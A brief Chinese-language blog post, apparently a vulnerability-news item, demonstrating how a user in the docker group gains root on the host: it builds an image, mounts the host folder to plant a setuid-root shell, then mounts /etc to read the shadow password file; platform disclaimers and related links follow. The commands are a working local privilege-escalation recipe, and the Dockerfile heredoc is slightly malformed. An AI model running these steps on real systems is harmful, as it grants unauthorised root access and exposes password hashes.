# 獲取 Docker 的 Root
# user 必須在 docker 用戶組中
ek@victum:~/docker-test$ id
uid=1001[ek] gid=1001[ek] groups=1001[ek],114[docker]
ek@victum:~$ mkdir docker-test
ek@victum:~$ cd docker-test
ek@victum:~$ cat > Dockerfile
FROM debian:wheezy
ENV WORKDIR /stuff
RUN mkdir -p $WORKDIR
VOLUME [ $WORKDIR ]
WORKDIR $WORKDIR
<< EOF
ek@victum:~$ docker build -t my-docker-image .
ek@victum:~$ docker run -v $PWD:/stuff -t my-docker-image /bin/sh -c \
'cp /bin/sh /stuff && chown root.root /stuff/sh && chmod a+s /stuff/sh'
./sh
whoami
# root
ek@victum:~$ docker run -v /etc:/stuff -t my-docker-image /bin/sh -c 'cat /stuff/shadow'
漏洞新聞-- Docker 獲取root
最后編輯于 :
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。
相關(guān)閱讀更多精彩內(nèi)容
- 在網(wǎng)上搜索Cannot connect to the Docker daemon.這個問題,基本上都是說權(quán)限不夠?qū)?..
- 漏洞概述: Dawid Golunski在 MySQl, MariaDB 和 PerconaDB 數(shù)據(jù)庫中發(fā)現(xiàn)條件...
- 近日,國家信息安全漏洞庫(CNNVD)收到360安全衛(wèi)士阿爾法團隊關(guān)于Chrome V8引擎“BadKernel”...
- 文章作者:Tyan博客:noahsnail.com | CSDN | 簡書 1. CentOS 7下docker的...
- 1、上午采銅老師的課程 2、下午班級小組賽 3、晚上去浦東機場 小確幸 今天和小組同學(xué)討論班級運營的第一性原理。 ...